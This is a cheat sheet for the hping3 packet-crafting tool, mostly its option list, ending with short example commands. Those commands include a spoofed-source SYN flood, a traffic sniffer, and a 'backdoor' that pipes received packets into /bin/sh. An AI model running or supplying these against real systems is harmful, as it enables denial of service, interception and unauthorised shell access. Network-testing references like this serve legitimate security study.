GX-CS - Cheat Sheet - Hping3

General options:
  -h  --help        show this help
  -v  --version     show version
  -i  --interval    wait (uX for X microseconds, for example -i u1000)
      --fast        alias for -i u1000 (10 packets per second)
      --faster      alias for -i u1000 (100 packets per second)
      --flood       send packets as fast as possible. Don't show replies.
  -n  --numeric     numeric output
  -q  --quiet       quiet
  -I  --interface   interface name (otherwise default routing interface)
  -V  --verbose     verbose mode
  -D  --debug       debugging info
  -z  --bind        bind ctrl+z to ttl (default to dst port)
  -Z  --unbind      unbind ctrl+z
      --beep        beep for every matching packet received

Modes:
  -0  --rawip       RAW IP mode
  -2  --udp         UDP mode
  -8  --scan        SCAN mode (Example: hping --scan 1-30,70-90 -S www.target.host)
  -9  --listen      listen mode

ICMP options:
  -C  --icmptype    icmp type (default echo request)
      --force-icmp  send all icmp types (default: send only supported types)
      --icmp-gw     set gateway address for ICMP redirect (default 0.0.0.0)
      --icmp-ts     alias for --icmp --icmptype 13 (ICMP timestamp)
      --icmp-addr   alias for --icmp --icmptype 17 (ICMP address subnet mask)
      --icmp-help   display help for other icmp options

IP options:
  -N  --id          id (default random)
  -W  --winid       use win* id byte ordering
  -r  --rel         relativize id field (to estimate host traffic)
  -f  --frag        split packets in more fragments (may pass weak acl)
  -x  --morefrag    set more fragments flag
  -y  --dontfrag    set don't fragment flag
  -g  --fragoff     set the fragment offset
  -m  --mtu         set virtual mtu, implies --frag if packet size > mtu
  -o  --tos         type of service (default 0x00), try --tos help
  -G  --rroute      include RECORD_ROUTE option and display the route buffer
      --lsrr        loose source routing and record route
      --ssrr        strict source routing and record route
  -H  --ipproto     set the IP protocol field, only in RAW IP mode

UDP/TCP parameters:
  -s  --baseport    base source port (default random)
  -p  --destport    [+][+]<port> destination port (default 0), ctrl+z inc/dec
  -k  --keep        keep still source port
  -w  --win         winsize (default 64)
  -O  --tcpoff      set fake tcp data offset (instead of tcphdrlen / 4)
  -Q  --seqnum      show only tcp sequence number
  -b  --badcksum    (try to) send packets with a bad IP checksum; many systems
                    will fix the IP checksum when sending the packet, so you'll
                    get a bad UDP/TCP checksum instead
  -M  --setseq      set TCP sequence number
  -A  --ack         set ACK flag
  -U  --urg         set URG flag
  -X  --xmas        set X unused flag (0x40)
  -Y  --ymas        set Y unused flag (0x80)
      --tcpexitcode    use last tcp->th_flags as exit code
      --tcp-mss        enable the TCP MSS option with the given value
      --tcp-timestamp  enable the TCP timestamp option to guess the HZ/uptime

Common options:
  -J  --print       dump printable characters
  -B  --safe        enable 'safe' protocol
  -u  --end         tell you when --file reached EOF and prevent rewind
  -T  --traceroute  traceroute mode (implies --bind and --ttl 1)
      --tr-stop     exit when the first non-ICMP packet is received in traceroute mode
      --tr-keep-ttl keep the source TTL fixed, useful to monitor just one hop
      --tr-no-rtt   don't calculate/show RTT information in traceroute mode

ARS packet description (new, unstable):
      --apd-send    send the packet described with APD (see docs/APD.txt)

Fuzzing:
  hping3 -2 [4.2.2.1] -p ++44444 -T -n
      basic UDP traceroute fuzzing; if stuck, press CTRL+Z to skip the unresponsive hop

Sniffer:
  hping3 -9 HTTP -I eth0
      listening mode, intercept traffic going through our machine's network interface

File Transfer:
  hping3 -1 [IP Addr] -9 signature -I eth0
      receiving files (transfer complete)

Backdoor:
  hping3 -I eth1 -9 secret | /bin/sh
      receiving packets to /bin/sh in order to create a simple backdoor

Flooding:
  hping3 -S [Target IP Addr] -a [IP Addr] -p 22 --flood
      classic flooding attack